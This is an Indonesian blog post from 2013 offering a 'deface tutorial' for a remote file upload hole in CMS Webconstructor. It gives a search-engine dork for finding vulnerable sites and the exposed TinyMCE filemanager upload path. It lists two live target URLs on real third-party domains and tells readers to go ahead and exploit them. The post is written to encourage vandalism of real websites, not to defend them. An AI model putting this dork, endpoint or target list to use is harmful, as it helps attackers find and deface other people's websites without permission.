Assalamualaikum sobat Ketemu sama saya lagi nih hhehe, kali ini saya mau share tutorial deface yang ajib lagi, yaitu “CMS Webconstructor Remote File Upload Vulnerability” semoga bermanfaat ya karena saya yakin tutorial saya bermanfaat semua nya hhaha. Ok simak berikut ini.
===============================================
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
===============================================
-> Exploit <-
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
-> Allowed File <-
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp
-> Preview <-
- You can see if you success upload file.
-> Live Target <-
http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
===============================================
Sudah cukup begitu, saya rasa kalian sudah mengerti bagaimana cara eksekusi nya hehe, kalau yang bingung? Komen aja di bawah, InsyaAllah saya feedback dengan cepat
Semoga bermanfaat aja ya, Wassalamualaikum
Anda baru saja membaca artikel yang berkategori Hacking
dengan judul CMS Webconstructor Remote File Upload 2013. Anda bisa bookmark halaman ini dengan URL http://predator-technology.blogspot.com/2013/06/cms-webconstructor-remote-file-upload.html. Terima kasih!
Ditulis oleh:
VeRZaW#021 - 28 June 2013
Belum ada komentar untuk "CMS Webconstructor Remote File Upload 2013"
Post a Comment
Mohon Memberi Komentar dengan Kata-Kata yang Sopan !!